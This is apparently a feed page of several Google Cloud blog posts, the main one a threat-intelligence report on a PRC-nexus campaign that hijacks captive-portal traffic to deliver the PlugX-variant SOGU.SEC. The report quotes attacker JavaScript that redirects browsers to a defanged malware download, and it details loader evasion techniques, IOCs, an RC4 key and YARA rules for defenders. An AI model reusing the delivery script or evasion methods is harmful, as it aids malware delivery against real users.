Final Reminder

This benchmarking and tuning process demonstrates the critical importance of evaluating different hardware options to find the optimal balance of performance and cost for your specific AI workload. We need to keep in mind the following sizing these workloads:

If our workload changed (e.g., input length, output length, prefix-caching percentage, or our requirements) the outcome of this guide may be different – the anonymized candidate could outperform v6e in several scenarios depending on the workload.
If we considered the other possible accelerators mentioned above, we may find a more cost effective approach that meets our requirements.
Finally, we covered a relatively small parameter space in our auto_tune.sh script for this example – perhaps if we searched a larger space we may have found a configuration with even greater cost savings potential.

Additional Resources

The following is a collection of additional resources to help you complete the guide and better understand the concepts described.

Read More for the details.

2025 08 25

GCP – Deception in Depth: PRC-Nexus Espionage Campaign Hijacks Web Traffic to Target Diplomats

Tibor Kiss Cloud, Google Cloud gcp

Written by: Patrick Whitsell

In March 2025, Google Threat Intelligence Group (GTIG) identified a complex, multifaceted campaign attributed to the PRC-nexus threat actor UNC6384. The campaign targeted diplomats in Southeast Asia and other entities globally. GTIG assesses this was likely in support of cyber espionage operations aligned with the strategic interests of the People’s Republic of China (PRC).

The campaign hijacks target web traffic, using a captive portal redirect, to deliver a digitally signed downloader that GTIG tracks as STATICPLUGIN. This ultimately led to the in-memory deployment of the backdoor SOGU.SEC (also known as PlugX). This multi-stage attack chain leverages advanced social engineering including valid code signing certificates, an adversary-in-the-middle (AitM) attack, and indirect execution techniques to evade detection.

Google is actively protecting our users and customers from this threat. We sent government-backed attacker alerts to all Gmail and Workspace users impacted by this campaign. We encourage users to enable Enhanced Safe Browsing for Chrome, ensure all devices are fully updated, and enable 2-Step Verification on accounts. Additionally, all identified domains, URLs, and file hashes have been added to the Google Safe Browsing list of unsafe web resources. Google Security Operations (SecOps) has also been updated with relevant intelligence, enabling defenders to hunt for this activity in their environments.

aside_block: <ListValue: [StructValue([(‘title’, ‘Webinar: Defending Against Sophisticated and Evolving PRC-Nexus Espionage Campaigns’), (‘body’, <wagtail.rich_text.RichText object at 0x3ebcfc7c4af0>), (‘btn_text’, ‘Register now’), (‘href’, ‘https://www.brighttalk.com/webcast/7451/651182?utm_source=blog’), (‘image’, None)])]>

Overview

This blog post presents our findings and analysis of this espionage campaign, as well as the evolution of the threat actor’s operational capabilities. We examine how the malware is delivered, how the threat actor utilized social engineering and evasion techniques, and technical aspects of the multi-stage malware payloads.

In this campaign, the malware payloads were disguised as either software or plugin updates and delivered through UNC6384 infrastructure using AitM and social engineering tactics. A high level overview of the attack chain:

The target’s web browser tests if the internet connection is behind a captive portal;
An AitM redirects the browser to a threat actor controlled website;
The first stage malware, STATICPLUGIN, is downloaded;
STATICPLUGIN then retrieves an MSI package from the same website;
Finally, CANONSTAGER is DLL side-loaded and deploys the SOGU.SEC backdoor.

Malware Delivery: Captive Portal Hijack

GTIG discovered evidence of a captive portal hijack being used to deliver malware disguised as an Adobe Plugin update to targeted entities. A captive portal is a network setup that directs users to a specific webpage, usually a login or splash page, before granting internet access. This functionality is intentionally built into all web browsers. The Chrome browser performs an HTTP request to a hardcoded URL (“http://www.gstatic.com/generate_204”) to enable this redirect mechanism.

While “gstatic.com” is a legitimate domain, our investigation uncovered redirect chains from this domain leading to the threat actor’s landing webpage and subsequent malware delivery, indicating an AitM attack. We assess the AitM was facilitated through compromised edge devices on the target networks. However, GTIG did not observe the attack vector used to compromise the edge devices.

Fake Plugin Update

After being redirected, the threat actor attempts to deceive the target into believing that a software update is needed, and to download the malware disguised as a “plugin update”. The threat actor used multiple social engineering techniques to form a cohesive and credible update theme.

The landing webpage resembles a legitimate software update site and uses an HTTPS connection with a valid TLS certificate issued by Let’s Encrypt. The use of HTTPS offers several advantages for social engineering and malware delivery. Browser warning messages, such as “Not Secure” and “Your connection is not private”, will not be displayed to the target, and the connection to the website is encrypted, making it more difficult for network-based defenses to inspect and detect the malicious traffic. Additionally, the malware payload is disguised as legitimate software and is digitally signed with a certificate issued by a Certificate Authority.

$ openssl x509 -in mediareleaseupdates.pem -noout -text -fingerprint -sha256

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            05:23:ee:fd:9f:a8:7d:10:b1:91:dc:34:dd:ee:1b:41:49:bd
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: C=US, O=Let's Encrypt, CN=R10
        Validity
            Not Before: May 17 16:58:11 2025 GMT
            Not After : Aug 15 16:58:10 2025 GMT
        Subject: CN=mediareleaseupdates[.]com

sha256 Fingerprint=6D:47:32:12:D0:CB:7A:B3:3A:73:88:07:74:5B:6C:F1:51:A2:B5:C3:31:65:67:74:DF:59:E1:A4:E2:23:04:68

Figure 3: Website TLS certificate

The initial landing page is completely blank with a yellow bar across the top and a button that reads “Install Missing Plugins…”. If this technique successfully deceives the target into believing they need to install additional software, they may be more willing to manually bypass host-based Windows security protections to execute the delivered malicious payload.

In the background, Javascript code is loaded from a script file named “style3.js” hosted on the same domain as the HTML page. When the target clicks the install button “myFunction”, which is located in the loaded script, is executed.

<head>
	<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
	<title>Additional plugins are required to display all the media on this page</title>

	<script type="text/javascript" src="https[:]//mediareleaseupdates[.]com/style3.js"> </script>

</head>
<body><div id="adobe update" onclick="myFunction()"...

Figure 5: Javascript from AdobePlugins.html

Inside of “myFunction” another image is loaded to display as the background image on the webpage. The browser window location is also set to the URL of an executable, again hosted on the same domain.

function myFunction()
{
    var img = new Image();
    img.src ="data:image/png;base64,iVBORw0KGgo[cut]
...
    document.body.innerHTML = '';
    document.body.style.backgroundImage = 'url(' + img.src + ')';
... 
    window.location.href = "https[:]//mediareleaseupdates[.]com/AdobePlugins.exe";
}

Figure 6: Javascript from style3.js

This triggers the automatic download of “AdobePlugins.exe” and a new background image to be displayed on the webpage. The image shows instructions for how to execute the downloaded binary and bypass potential Windows security protections.

Figure 7: Malware landing page post-download

When the downloaded executable is run, the fake install prompt seen in the above screenshot for “STEP 2” is displayed on screen, along with “Install” and “Cancel” options. However, the SOGU.SEC payload is likely already running on the target device, as neither button triggers any action relevant to the malware.

Malware Analysis

Upon successful delivery to the target Windows system, the malware initiates a multi-stage deployment chain. Each stage layers tactics designed to evade host-based defenses and maintain stealth on the compromised system. Finally, a novel side-loaded DLL, tracked as CANONSTAGER, concludes with in-memory deployment of the SOGU.SEC backdoor, which then establishes communication with the threat actor’s command and control (C2) server.

Digitally Signed Downloader: STATICPLUGIN

The downloaded “AdobePlugins.exe” file is a first stage malware downloader. The file was signed by Chengdu Nuoxin Times Technology Co., Ltd. with a valid certificate issued by GlobalSign. Signed malware has the major advantage of being able to bypass endpoint security protections that typically trust files with valid digital signatures. This gives the malware false legitimacy, making it harder for both users and automated defenses to detect.

The binary was code signed on May 9th, 2025, possibly indicating how long this version of the downloader has been in use. While the signing certificate expired on July 14th, 2025 and is no longer valid, it may be easy for the threat actor to re-sign new versions of STATICPLUGIN with similarly obtained certificates.

Figure 8: Downloader with valid digital signature

STATICPLUGIN implements a custom TForm which is designed to masquerade as a legitimate Microsoft Visual C++ 2013 Redistributables installer. The malware uses the Windows COM Installer object to download another file from “https[:]//mediareleaseupdates[.]com/20250509[.]bmp”. However, the “BMP” file is actually an MSI package containing three files. After installation of these files, CANONSTAGER is executed via DLL side-loading.

Filename	Description	Hash
`cnmpaui.exe`	`Canon IJ Printer Assistant Tool`	`4ed76fa68ef9e1a7705a849d47b3d9dcdf969e332bd5bcb68138579c288a16d3`
`cnmpaui.dll`	CANONSTAGER	`e787f64af048b9cb8a153a0759555785c8fd3ee1e8efbca312a29f2acb1e4011`
`cnmplog.dat`	`RC4 Encrypted SOGU.SEC`	`cc4db3d8049043fa62326d0b3341960f9a0cf9b54c2fbbdffdbd8761d99add79`

Certificate Subscriber — Chengdu Nuoxin Times Technology Co., Ltd

Our investigation found this is not the first suspicious executable signed with a certificate issued to Chengdu Nuoxin Times Technology Co., Ltd. GTIG is currently tracking 25 known malware samples signed by this Subscriber that are in use by multiple PRC-nexus activity clusters. Many examples of these signed binaries are available in VirusTotal.

GTIG has previously investigated two additional campaigns using malware signed by this entity. While GTIG does not attribute these other campaigns to UNC6384, they have multiple similarities and TTP overlaps with this UNC6384 campaign, in addition to using the same code signing certificates.

Delivery through web-based redirects
Downloader first stage, sometimes packaged in an archive.
In-memory droppers and memory-only backdoor payloads
Masquerading as legitimate applications or updates
Targeting in Southeast Asia

It remains an open question how the threat actors are obtaining these certificates. The Subscriber organization may be a victim with compromised code signing material. However, they may also be a willing participant or front company facilitating cyber espionage operations. Malware samples signed by Chengdu Nuoxin Times Technology Co., Ltd date back to at least January 2023. GTIG is continuing to monitor the connection between this entity and PRC-nexus cyber operations.

Malicious Launcher: CANONSTAGER

Once CANONSTAGER is executed, its ultimate purpose is to surreptitiously execute the encrypted payload, a variant of SOGU tracked as SOGU.SEC. CANONSTAGER implements a control flow obfuscation technique using custom API hashing and Thread Local Storage (TLS). The launcher also abuses legitimate Windows features such as window procedures, message queues, and callback functions to execute the final payload.

API Hashing and Thread Local Storage

Thread Local Storage (TLS) is intended to provide each thread in a multi-threaded application its own private data storage. CANONSTAGER uses the TLS array data structure to store function addresses resolved by its custom API hashing algorithm. The function addresses are later called throughout the binary from offsets into the TLS array.

In short, the API hashing hides which Windows APIs are being used, while the TLS array provides a stealthy location to store the resolved function addresses. Use of the TLS array for this purpose is unconventional. Storing function addresses here may be overlooked by analysts or security tooling scrutinizing more common data storage locations.

Below is an example of CANONSTAGER resolving and storing the GetCurrentDirectoryW function address.

Resolve the GetCurrentDirectoryW hash (0x6501CBE1)
Get the location of the TLS array from the Thread Information Block (TIB)
Move the resolved function address into offset 0x8 of the TLS array

Figure 9: Example of storing function addresses in TLS array

Indirect Code Execution

CANONSTAGER hides its launcher code in a custom window procedure and triggers its execution indirectly using the Windows message queue. Using these legitimate Windows features lowers the likelihood of security tools detecting the malware and raising alerts. It also obscures the malware’s control flow by “hiding” its code inside of the window procedure and triggering execution asynchronously.

At a high level, CANONSTAGER:

Registers a class containing a callback function;
Creates a new window with the registered class;
Sends WM_SHOWWINDOW to the message queue;
Enters a message loop to receive and dispatch messages to the created window;
Creates a new thread to decrypt “cnmplog.dat” as SOGU.SEC when the window receives the WM_SHOWWINDOW message; then
Executes SOGU.SEC in-memory with an EnumSystemGeoID callback.

Figure 10: Overview of CANONSTAGER execution using Windows message queue

Window Procedure

On a Windows system, every window class has an associated window procedure. The procedure allows programmers to define a custom function to process messages sent to the specified window class.

CANONSTAGER creates an Overlapped Window with a registered WNDCLASS structure. The structure contains a callback function to the programmer-defined window procedure for processing messages. Additionally, the window is created with a height and width of zero to remain hidden on the screen.

Inside the window procedure, there is a check for message type 0x0018 (WM_SHOWWINDOW). When a message of this type is received, a new thread is created with a function that decrypts and launches the SOGU.SEC payload. For any message type other than 0x0018 (or 0x2 to ExitProcess), the window procedure calls the default handler (DefWindowProc), ignoring the message.

Message Queue

Windows applications use Message Queues for asynchronous communication. Both user applications and the Windows system can post messages to Message Queues. When a message is posted to an application window, the system calls the associated window procedure to process the message.

In order to trigger the malicious window procedure, CANONSTAGER uses the ShowWindow function to send a WM_SHOWWINDOW (0x0018) message to its newly created window via the Message Queue. Since the system, or other applications, may also post messages to the CANONSTAGER’s window, a standard Windows message loop is entered. This allows all posted messages to be sent, including the intended WM_SHOWWINDOW message.

GetMessageW – retrieve all messages in the thread’s message queue.
TranslateMessage – Convert message from a “virtual-key” to a “character message”.
DispatchMessage – Delivers the message to the specific function (WindowProc) that handles messages for the window targeted by that message.
Loop back to 1, until all messages are dispatched.

Deploying SOGU.SEC

After the correct message type is received by the window procedure, CANONSTAGER moves on to deploying its SOGU.SEC payload with the following steps:

Read the encrypted “cnmplog.dat” file, packaged in the downloaded MSI;
Decrypt the file with a hardcoded 16-byte RC4 key;
Execute the decrypted payload using an EnumSystemsGeoID callback function.

Figure 11: Callback function executing SOGU.SEC

UNC6384 has previously used both payload encryption and callback functions to deploy SOGU.SEC. These techniques are used to hide malicious code, evade detection, obfuscate control flow, and blend in with normal system activity. Additionally, all of these steps are done in-memory, avoiding endpoint file-based detections.

The Backdoor: SOGU.SEC

SOGU.SEC is a distinct variant of SOGU and is commonly deployed by UNC6384 in cyber espionage activity. This is a sophisticated, and heavily obfuscated, malware backdoor with a wide range of capabilities. It can collect system information, upload and download files from a C2, and execute a remote command shell. In this campaign, SOGU.SEC was observed communicating directly with the C2 IP address “166.88.2[.]90” using HTTPS.

Attribution

GTIG attributes this campaign to UNC6384, a PRC-nexus cyber espionage group believed to be associated with the PRC-nexus threat actor TEMP.Hex (also known as Mustang Panda). Our attribution is based on similarities in tooling, TPPs, targeting, and overlaps in C2 infrastructure. UNC6384 and TEMP.Hex are both observed to target government sectors, primarily in Southeast Asia, in alignment with PRC strategic interests. Both groups have also been observed to deliver SOGU.SEC malware from DLL side-loaded malware launchers and have used the same C2 infrastructure.

Conclusion

This campaign is a clear example of the continued evolution of UNC6384’s operational capabilities and highlights the sophistication of PRC-nexus threat actors. The use of advanced techniques such as AitM combined with valid code signing and layered social engineering demonstrates this threat actor’s capabilities. This activity follows a broader trend GTIG has observed of PRC-nexus threat actors increasingly employing stealthy tactics to avoid detection.

GTIG actively monitors ongoing threats from actors like UNC6384 to protect users and customers. As part of this effort, Google continuously updates its protections and has taken specific action against this campaign.

Acknowledgment

A special thanks to Jon Daniels for your contributions.

Appendix: Indicators of Compromise

A Google Threat Intelligence (GTI) collection of related IOCs is available to registered users.

File Hashes

Name	Hash (SHA-256)
AdobePlugins.exe	`65c42a7ea18162a92ee982eded91653a5358a7129c7672715ce8ddb6027ec124`
20250509.bmp (MSI)	`3299866538aff40ca85276f87dd0cefe4eafe167bd64732d67b06af4f3349916`
cnmpaui.dll	`e787f64af048b9cb8a153a0759555785c8fd3ee1e8efbca312a29f2acb1e4011`
cnmplog.dat	`cc4db3d8049043fa62326d0b3341960f9a0cf9b54c2fbbdffdbd8761d99add79`
SOGU.SEC (memory only)	`d1626c35ff69e7e5bde5eea9f9a242713421e59197f4b6d77b914ed46976b933`

Certificate Fingerprints / Thumbprints

Name	Hash (SHA-1)
mediareleaseupdates[.]com	`c8744b10180ed59bf96cf79d7559249e9dcf0f90`
AdobePlugins.exe	`eca96bd74fb6b22848751e254b6dc9b8e2721f96`

Network Indicators

Name	IOC
Landing Page	https[:]//mediareleaseupdates[.]com/AdobePlugins[.]html
Javascript	https[:]//mediareleaseupdates[.]com/style3[.]js
STATICPLUGIN	https[:]//mediareleaseupdates[.]com/AdobePlugins[.]exe
MSI Package	https[:]//mediareleaseupdates[.]com/20250509[.]bmp
Hosting IP	103.79.120[.]72
C2 IP	166.88.2[.]90
SOGU.SEC User Agent	Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)

Host Indicators

Name	IOC
Mutex Name	KNbgxngdS
RC4 Key	mqHKVbHWWAJwrLXD
Registry Key	HKCUSOFTWAREMicrosoftWindowsCurrentVersionRunCanonPrinter=”%APPDATA%cnmpaui.exe” 9 780
File Path	%LOCALAPPDATA%DNVjzaXMFO
File Path	C:UsersPublicIntelnet
File Path	C:UsersPublicSecurityScan

YARA Rules

rule G_Downloader_STATICPLUGIN_1 {
    meta:
        author = "GTIG"
        date_created = "2025-07-24"
        date_modified = "2025-07-24"
        description = "STATICPLUGIN is a downloader observed to retrieve an MSI packaged payload from a hard-coded C2 domain."
        md5 = "52f42a40d24e1d62d1ed29b28778fc45"
        rev = 1    
    strings:
        $s1 = "InstallRemoteMSI"
        $s2 = "InstallUpdate"
        $s3 = "Button1Click"
        $s4 = "Button2Click"
        $s5 = "WindowsInstaller.Installer" wide
    condition:
        uint16(0)==0x5a4d and all of them
}

rule G_Launcher_CANONSTAGER_1 {
    meta:
        author = "GTIG"
        date_created = "2025-07-25"
        date_modified = "2025-07-25"
        description = "CANONSTAGER is a side-loaded DLL launcher used to decrypt and execute a payload in-memory."
        md5 = "fa71d60e43da381ad656192a41e38724"
        rev = 1
    strings:
        $str1 = ".dat" wide
        $str2 = "\cnmplog" wide		
        $code1 = {43 0F B6 ?? 0F B6 [3]00 D0 0F B6 ?? 8A 74 [2]88 74 [2]88 54 [2]8B 7? [2]02 54 [2]0F B6 ?? 0F B6 [3]32 14 ?? [0-4] 88 14 ?? 41 39 ?? 75 C? }		
        $code2 = {0F B6 [3] 89 ?? 83 E? 0F 00 D0 02 ?? [1-2] 0F B6 ?? 8A 74 [2] 88 74 [2] 4? 88 54 [2]81 F? 00 01 00 00 75 D?}
        $code3 = {40 89 ?? 0F B6 C0 0F B6 [3]00 D9 88 9? [4-5]0F B6 F? 8A 7C 3? ?? 88 7C 0? ?? 88 5C 3? ?? 02 5C 0? ?? 0F B6 F? 0F B6 5C 3? ?? [0-2]8B [3]32 1C ?? [7-8]42 [0-2]39 D? 75 BC }
    condition:
        all of ($str*) and 2 of ($code*)
}

Read More for the details.

2025 08 22

GCP – Don’t just speculate, investigate! Gemini Cloud Assist now offers root-cause analysis

Tibor Kiss Cloud, Google Cloud gcp

Debugging in a complex, distributed cloud environment can feel like searching for a needle in a haystack. The sheer volume of data, intertwined dependencies, and ephemeral issues make traditional troubleshooting methods time-consuming and often reactive. Just as modern software development demands more context for effective debugging, so too does cloud operations.

Gemini Cloud Assist, a key product in the Google Cloud with Gemini portfolio, simplifies the way you manage your applications with AI-powered assistance to help you design, deploy, and optimize your apps, so you can reach your efficiency, cost, reliability, and security goals.

Then there’s Gemini Cloud Assist investigations, a root-cause analysis (RCA) AI agent for troubleshooting infrastructure and applications that is now available in preview.

When you encounter an issue, you can initiate an investigation from various places like the Logs Explorer, Cloud Monitoring alerts, or directly from the Gemini chat panel. Cloud Assist then analyzes data from multiple sources, including logs, configurations, and metrics, to produce ranked and filtered “Observations” that provide insights into your environment’s state. It synthesizes these observations to diagnose probable root causes, explains the context, and recommends the next steps or fixes to resolve the problem. If you need more help, your investigation, along with all its context, can be seamlessly transferred into a Google Cloud support case to expedite resolution with a support engineer.

How Gemini Cloud Assist investigations works

Gemini Cloud Assist investigations helps to find the root cause of an issue using a combination of capabilities:

Programmatic, proactive, and interactive access: Trigger or consume your investigation through API calls, chat menu, or UI for proactive or interactive troubleshooting.
Contextualization: Investigations discover the most relevant resources, data sources, and APIs in your environment to provide focused troubleshooting.
Comprehensive signal analysis: Investigations perform deep analysis in parallel across Cloud Logs, Cloud Asset Inventory, App Hub, Metrics, Errors, and Log Themes to uncover anomalies, configuration changes, performance bottlenecks, and recurring issues.
AI-powered insights and recommendations: Utilizing specialized knowledge sources, like Google Cloud support knowledgebases and internal runbooks, investigations generate probable root cause and actionable recommendations.
Interactive collaboration – Chat with and share investigations across your team for collaborative troubleshooting between you, your team, and Gemini Cloud Assist.
Handoff to Google Cloud Support: Convert your investigation directly to a support case without losing any time or context.

1 Unveiling Gemini Cloud Assist Investigations_ Your AI-Powered Cloud Troubleshooting Agent — Programmatic, proactive, and interactive investigations

Early users are thrilled with the speed and effectiveness with which Cloud Assist investigations helps them troubleshoot and resolve tough problems.

“At ZoomInfo, maintaining uptime is critical, but equally important is ensuring our engineers can swiftly and effectively troubleshoot complex issues. By integrating Gemini Cloud Assist investigations early into our development process, we’ve accelerated troubleshooting across all levels of our engineering team. Engineers at every experience level can now rapidly diagnose and resolve problems, reducing some resolution times from hours to minutes. This efficiency enables our teams to spend more energy innovating and less time on reactive problem-solving. Gemini Cloud Assist investigations isn’t just a troubleshooting aid; it’s a key driver of productivity and innovation.” – Yasin Senturk, DevOps Engineer at ZoomInfo

“I’m really impressed by how Gemini Cloud Assist Investigations feature in 2 minutes turned over with some valid suggestions on the potential root causes, and the first one being the actual culprit! I was able to mitigate the whole issue within an hour. Gemini Cloud Assist really saved my weekend!” – Chuanzhen Wu, SRE, Google Waze

Let’s walk through Gemini Cloud Assist investigations’ capabilities in a bit more detail.

Programmatic, proactive, and interactive access
You can start an investigation directly from various points within Google Cloud, such as error messages in Logs Explorer or specific product pages (like Google Kubernetes Engine or Cloud Run), or from the central Investigations page, where you can provide context like error messages, affected resources, and observation time. Gemini Cloud Assist investigations also provides an API, allowing you to integrate it into existing workflows such as Slack or other incident management tools. If the root cause of an issue requires further assistance, you can trigger a Google Cloud support case with the Investigation response so support engineers can proceed from that point.

Contextualization
Investigations can start with a natural language description, error message, log snippets, or any combination of information that you have about your issue. It starts by gathering the initial context related to your issue, then builds a topology of relevant resources and all the associated data sources that might provide insights to the root cause.

Investigations uses both public and private knowledge, playbooks informed by Google SRE and Google Cloud Support issues, and your topology, grounding itself in similar issues before generating a troubleshooting plan for your issue. This context becomes key in providing focused and comprehensive signal analysis.

Comprehensive signal analysis
Once the investigation runs, you’ll see the observations that it starts to collect from your project. The investigation goes beyond surface-level observations; it automatically analyzes critical data sources across your Google Cloud environment, including:

Google Cloud logs: Sifting through vast log data to identify anomalies and critical events
Cloud Asset Inventory: Understanding changes in your resource configurations and their potential impact
Metrics (coming soon): Correlating performance data to pinpoint resource exhaustion or unexpected behavior
Errors: Aggregating and categorizing errors to highlight patterns and recurring problems
Log themes: Identifying common patterns and themes within log data to provide a higher-level view of issues

AI-powered insights and recommendations
Observations are the basis of Gemini Cloud Assist investigations’ root-cause insights and recommendations. Leveraging Gemini’s analytical capabilities, Cloud Assist synthesizes observations from disparate data sources, ranking and filtering information to focus on the most relevant details. Crucially, investigations draw upon differentiated knowledge sources and publicly available documentation, such as extensive Google Cloud support troubleshooting knowledge and internal runbooks, to generate highly accurate and relevant insights and observations. It then generates:

Probable root cause: Provides clear hypotheses about the underlying cause of the issue, complete with contextual explanations
Actionable recommendations: Offers concrete next steps for troubleshooting or even direct fixes, helping you resolve incidents faster

Handoff to Google Support teams
If an issue proves particularly elusive, with the click of a button, investigations packages context, observations, and hypotheses into a support case, for faster issue resolution. This is why you might want to run an investigation before contacting Google support teams about an issue.

Get started with Gemini Cloud Assist investigations today

Ready to get to the root of your troubles faster? Try investigations now by investigating any error logs from the Log Explorer console. Or create an investigation directly and describe any issues you might be having.

Read More for the details.

2025 08 21

GCP – How startups can help build — and benefit from — the AI revolution

Tibor Kiss Cloud, Google Cloud gcp

Startups are at the forefront of generative AI development, pushing current capabilities and unlocking new potential. Building on our Future of AI: Perspectives for Startups 2025 report, several of the AI industry leaders featured in the report joined Jason Calacanis on the “This Week in Startups” podcast’s Startup Basics series, offering their perspective on what’s next for AI.

Memory, multi-agent systems, better UX

Harrison Chase, CEO and co-founder of LangChain, spoke to the impact memory will have on agent continuity, particularly when it comes to contextual knowledge. As memory becomes more common, agents will gain experience (rather than just instructions) on how companies and team members work through feedback, preferences, and more natural subsequent adaptations, enabling deeply personalized interactions. As Jia Li, president of LiveX AI noted, ‘What the users truly appreciate is when AI agents understand their needs and are thinking from their point of view”.

Another exciting prospect is multi-agent collaboration, Chase said, since most AI systems still work in isolation. As agents increasingly collaborate with each other, task management, information sharing, and even delegation of duties in accordance with agent specializations will allow agents to become more efficient and reduce cognitive load for their users. This vision goes beyond simple queries, Yoav Shoham, co-founder of AI21 Labs, explained: “Typically when we speak about agents, what we have in mind is a system that’s not a transactional call to an LLM. The agent can be proactive, it executes complicated flows using multiple tools.”

That’s why Google launched a new, open protocol called Agent2Agent (A2A) — to help AI agents communicate with each other, securely exchange information, and coordinate actions on top of various enterprise platforms or applications. The A2A effort signifies a shared vision of a future when AI agents, regardless of their underlying technologies, can collaborate to automate complex enterprise workflows, to drive new levels of efficiency and innovation. We believe the A2A framework will add significant value for customers, allowing AI agents to work across their entire application estates.

aside_block: <ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud AI and ML’), (‘body’, <wagtail.rich_text.RichText object at 0x3e319176c070>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

Building trust in a world of autonomous AI

On the topic of multi-agent collaboration, Saurabh Tiwary, VP and GM of Cloud AI at Google, discussed how AI agents are moving beyond simple chat interfaces. He explained that today’s AI agents are designed for indeterminate tasks, and are capable of taking actions, observing outputs, and dynamically determining subsequent steps. This advanced functionality paves the way for agents to manage complex workflows such as autonomously handling emails, identifying critical tasks, and even delegating responsibilities across teams. But for this future to become reality, Saurabh underscored the need for agents to deliver high-quality output, to foster user trust and encourage the delegation of important tasks. Echoing this, LiveX AI’s Jia Li said “we believe humanlike AI agents can create that empathy and trust between consumers and the AI agent.”

At Google, we’re addressing the need for agents to work across diverse environments by offering Agent Development Kit (ADK) and the A2A protocol as open-source.

We recently donated A2A to the Linux Foundation, establishing an open governance body for the protocol. This critical step will help A2A evolve as a universal standard, fostering interoperability between agents built on any platform or using any underlying technology — not just Google’s ADK. With support from over 120 partners, including major hyperscalers like Microsoft and Amazon, this standardization allows for a future where diverse, specialized AI agents can communicate, securely exchange information, and coordinate actions across a business’s entire application ecosystem.

AI21 Lab’s Yoav Shoham pointed out that for agents to collaborate across different organizations, the fundamental hurdle of ‘semantics’ and ‘shared incentives’ must be overcome. This means that while A2A protocols may specify the syntax of communication, they do not guarantee a shared understanding of the meaning (semantics) of the information being exchanged, and agents from different organizations could have distinct or even conflicting goals, making for misaligned incentives. This presents an opportunity for startups to innovate by designing sophisticated game theory-based protocols, robust governance frameworks, and control mechanisms that ensure agents ‘play nice together’, even when their objectives differ.

Infrastructure performance is booming

At the same time, infrastructure performance is exploding at levels Amin Vahdat, Vice President for the AI and Infrastructure team at Google Cloud, has never seen before. “It’s not uncommon for us at Google to make things twice as fast in three months, and then we do it again three months later, and three months after that, and all of a sudden you have 10X or 20X performance improvements,” said Vahdat on the podcast.

“Twelve months ago, models sometimes struggled to count the number of ‘r’s’ in the word ‘strawberry,’ but today they are writing and executing code”, Vahdat said.

These improvements to model efficiency and performance have shifted the focus away from training and building models toward serving the models and maximizing their utility. Vahdat refers to 2025 as “the year of inference.”

At Google Cloud Next this April, we introduced our new, seventh-generation Tensor Processing Unit (TPU) called Ironwood, our first TPU specifically designed for inference. Ironwood dramatically improved performance while also improving power efficiency, meaning lower costs and greater workload capacity — all necessities to fuel the age of inference.

The growth of nimble startup teams

The way AI can augment and amplify human capabilities and efficiency extends well beyond the engineering team, touching every employee in a modern business.

AI can improve “every job, every function, every workflow,” offering “incredible leverage,” said David Friedberg, CEO of Ohalo Genetics. For example, you can use AI to scan and score hundreds of job resumes in just a couple of hours, a task that previously took days, or to generate comprehensive project plans in hours instead of weeks or months.

This efficiency means smaller, more nimble teams can achieve results that historically required much larger organizations. “We’ve really just shrunk the amount of time it takes to get from idea to testing and seeing if there’s value,” said Jill Chase, Partner at CapitalG. “That is the most powerful thing for startups.” This has grown startups’ addressable economic opportunities, allowing organizations with 100-200 people to pursue “deep tech” or technically difficult objectives that used to be the realm of thousand-plus-person companies. Companies leveraging AI gain significantly more “shots on goal.”

During Google I/O 2025 we highlighted major advancements in this area, emphasizing development with Gemini 2.5:

Google AI Studio, powered by Gemini, offers the fastest way for developers to evaluate models and begin building with the Gemini API. It integrates Gemini 2.5 Pro directly into the native code editor, streamlining the prototyping process. Using the Gen AI SDK, developers can instantly generate web applications from simple text, image, or video prompts.
Accessible via the Gemini API and new tools like URL Context, Gemini 2.5’s advanced reasoning capabilities allow the model to pull information from web pages, helping developers create agentic experiences. Furthermore, Gemini 2.5 Flash Native Audio, available in the Live API, can create agentic applications for speaking and listening in 24 languages with customizable voice and style. That means more natural back-and-forth conversations, with better flow and fewer extraneous sounds.
Colab’s agent-first experience, powered by Gemini 2.5 Flash, can help developers with complex tasks like fine-tuning models and building UIs, significantly reducing coding time. These tools make building faster, easier, and more efficient, so developers can focus on bringing their ideas to life.

Empowering startups to innovate more with less

At Google Cloud, we’re deeply committed to fostering innovation, providing not only cutting-edge tools and infrastructure, but also essential resources and expertise to help startups leverage AI effectively. No matter where you are with AI adoption, we’re here to help: Book your generative AI consultation today, get up to $350,000 USD in cloud credits with the Google for Startups Cloud Program, or contact our Startup team.

For more comprehensive insights into the future of AI and how Google Cloud can accelerate your startup’s growth, download the Future of AI: Perspectives for Startups 2025 report today.

Read More for the details.

2025 08 21

GCP – How to build a real-time voice agent with Gemini, Google ADK, and A2A protocol

Tibor Kiss Cloud, Google Cloud gcp

Building advanced conversational AI has moved well beyond text.

Now, we can use AI to create real-time, voice-driven agents. However, these systems need low-latency, two-way communication, real-time information retrieval, and the ability to handle complex tasks. This guide shows you how to build one using Gemini and the Google Agent Development Kit (ADK). You’ll learn how to create an intelligent, responsive voice agent.

The foundational agent

First, we create an agent with a persona but no access to external tools. This is the simplest agent, relying only on its pre-trained knowledge. It’s a great starting point.

code_block: <ListValue: [StructValue([(‘code’, ‘# In app/server/streaming_service.pyrnfrom google.adk.agents import Agentrnfrom core_utils import MODEL, SYSTEM_INSTRUCTIONrnrnself.agent = Agent(rn name=”voice_assistant_agent”,rn model=MODEL,rn instruction=SYSTEM_INSTRUCTION,rn # The ‘tools’ list is omitted for now.rn)’), (‘language’, ”), (‘caption’, <wagtail.rich_text.RichText object at 0x3e3194385be0>)])]>

This agent can chat, but it lacks access to external information.

The advanced agent

To make the agent useful, we add tools. This lets the agent access live data and services. In streaming_service.py, we give the agent access to Google Search and Google Maps.

